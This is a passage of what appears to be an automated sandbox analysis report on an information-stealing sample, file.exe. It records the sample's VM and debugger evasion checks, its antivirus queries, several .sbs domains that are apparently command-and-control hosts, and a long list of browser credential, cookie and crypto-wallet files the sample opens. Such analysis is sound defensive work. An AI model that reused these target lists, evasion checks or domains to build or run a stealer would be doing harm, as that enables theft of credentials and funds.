              Source: file.exe, 00000000.00000002.1672310264.0000000000A45000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1684689735.00000000062AE000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: file.exe, 00000000.00000002.1683311588.00000000058ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, 00000000.00000002.1673887495.0000000001116000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1673887495.00000000010E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1399357294.0000000005916000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000000.00000002.1672310264.0000000000A45000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1684689735.00000000062AE000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1399453733.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000003.1350613672.0000000004E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000003.1350613672.0000000004E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000003.1350613672.0000000004E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000003.1350613672.0000000004E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000003.1350613672.0000000004E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.1684689735.00000000062AE000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: LProgram Manager
              Source: file.exe, file.exe, 00000000.00000002.1672310264.0000000000A45000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, file.exe, 00000000.00000003.1442564491.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442655717.000000000119E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442496677.000000000119C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1452066837.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1445736691.0000000001180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7724, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"K'Z
              Source: file.exe, 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/ElectronCash
              Source: file.exe, 00000000.00000003.1428837584.0000000001185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exe, 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: file.exe, 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum
              Source: file.exe, 00000000.00000003.1428837584.0000000001185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: file.exe, 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Liveh
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
